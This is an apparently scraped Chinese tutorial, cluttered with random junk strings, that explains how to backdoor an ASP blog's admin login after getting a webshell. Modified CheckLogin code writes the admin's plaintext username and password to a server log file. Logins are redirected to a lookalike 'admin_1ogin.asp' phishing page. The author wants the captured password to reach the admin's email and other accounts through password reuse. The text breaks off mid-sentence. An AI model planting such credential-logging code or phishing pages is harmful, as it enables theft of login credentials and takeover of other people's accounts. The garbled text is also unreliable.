asp记录管理员账号密码.doc

asp记录管理员账号密码在一次安全检测中，其实已拿到了webshell了，但是我还要社工他的邮箱还有其他资料类，所以要得知道他的习性。 4= $!_,. 下载了数据库，但是md5密码没办法解密。唉，看来只要记录他的登录管理员 账号密码了！ (77Dif0) 省得还要去穷取法破解！ %SFw%3& 这个密码其实说重要也不重要 说不 重要 其实很重要。 ?bCTLt7k 因为很多人喜欢使用相同密码。即使是我这类安全检测人员，也免不了使用同一种账号密码的习惯。 b?M9f5 首先看看他的后台登陆代码 _VZ % : Wb1 Dim Login %0VcMG Set Login=new AdLogin 9.6Y* Login.Execute MbM :3 Class AdLogin ; SZC5 Private ExCommCls X9t Private Sub class_initialize EsS!07fAM: Set CommCls=new CommonCls Rf&thTH ExCommCls.IsIpAllow s-y(ll ExCommCls.CheckInstall FP0esc Private Sub class_terminate ( 1C Set ExCommCls=nothing BZ8h*|uT End Sub S!kt7io public Sub Execute tauP1&%oH Dim Action )3d:S*ly Action=Request(action) 2-/YYe;C Select Case Action a .B=3xn Case CheckLogin Bx_8+ CheckLogin 9*_(yjF Case LoginOut GN8xRJ* LoginOut uT8 _9 Case Else t2X! LoginF 3H?*( End Select L.R+$U2 End Sub |i jW_r Private Sub CheckLogin 4l#T_y Dim Adname,AdPwd,CheckCode 1L(Nfkh AdName=ExCommCls.G(Trim(request(Adname) 1yYhb,0 AdPwd=md5(Trim(request(AdPwd) 3w6J V+? CheckCode=ExCommCls.G(request(checkCode) X.W#=$;$: If Trim(CheckCode)session(excheckcode) and Application(sn&IsCheckCode)=是 Then &Gk.ODI7 ExCommCls.ShowMsg 验证码错误！,Application(sn&blogurl)&admin_login.asp sp GJ&C Exit Sub Z|.xgsY End If Jh/M%| If Trim(AdName)=CStr(Application(sn&AdName) And Trim(AdPwd)=CStr(Application(sn&AdPwd) Then cC(ubUR Response.Cookies(Md5(SN)(AdName)=AdName oVxV,oH( Response.Cookies(Md5(SN)(AdPwd)=AdPwd 2TevdyI session(AdLogin)=Md5(SN) :z5& h ExCommCls.GetConfigCache(*) IQIbOUo!v ExCommCls.GetClassCache() AlSq:gZ Response.Redirect(Application(sn&blogurl)&admin_index.asp) 4K ,wI Else MX NByNe 看下列代码 bz,cfc;?$ AdName=ExCommCls.G(Trim(request(Adname) XUfxNDf AdPwd=md5(Trim(request(AdPwd) SJuf 8GAQVe$- -意思很简单，这里就不明说了， 主要看md5 ,密码使用md5加密 这样的话，我们记录的密码也就没用了，还是md5。所以 ?ws0Ax 所以想到了，一个钓鱼手法。 它本来的登录界面是 zSM7x Private Sub CheckLogin Z 5YW L4s Dim Adname,AdPwd,CheckCode,StrLogText,ip,ff n(yW AdName=ExCommCls.G(Trim(request(Adname) ).x 6 AdPwd=(Trim(request(AdPwd) set f=Server.CreateObject(scripting.filesystemobject) s3RyLT set ff=f.opentextfile(server.mappath(.)&strLogFile,8,true,0) $aI MQ( ff.writeline(chr(13)+chr(10)&StrLogText) uR Wv ff.close ik NFW*p set ff=nothing # i=WNV set f=nothing z4+6k-#): If Trim(CheckCode)session(excheckcode) and Application(sn&IsCheckCode)=是 Then dH$Dm ExCommCls.ShowMsg 验证码错误！,Application(sn&blogurl)&Admin_1ogin.asp Lv_2/ Exit Sub Q&Nr3H#tZ End If 3Qr!?=nf If Trim(AdName)=CStr(Application(sn&AdName) And Trim(AdPwd)=CStr(Application(sn&AdPwd) Then C$;s+ALy Response.Cookies(Md5(SN)(AdName)=AdName Kd1D!#!6 Response.Cookies(SN)(AdPwd)=AdPwd Ntrn(! session(AdLogin)=Md5(SN) fy4JW,c ExCommCls.GetConfigCache(*) |OT%,QT| ExCommCls.GetClassCache() 6oBtr?CJ Response.Redirect(Application(sn&blogurl)&Admin_1ogin.asp) df rr.i Else xEWaP#.u ExCommCls.ShowMsg 帐号或密码错误,Application(sn&blogurl)&Admin_1ogin.asp X:r:r End if mW9bG3k End Sub L; Kg6 7cmj)f 看到没， OmML,d a=本来的登录页面 现在换成了钓鱼页面 0evZgJP b=本来的登录页面(admin_login.asp)修改成admin_1ogin.asp x;aZ& 为什么呢。 hc9Rk 本来的： AdPwd=md5(Trim(request(AdPwd) 2*FZ?Xr Response.Cookies(Md5(SN)(AdPwd)=AdPwd Z28yD + 修改 qe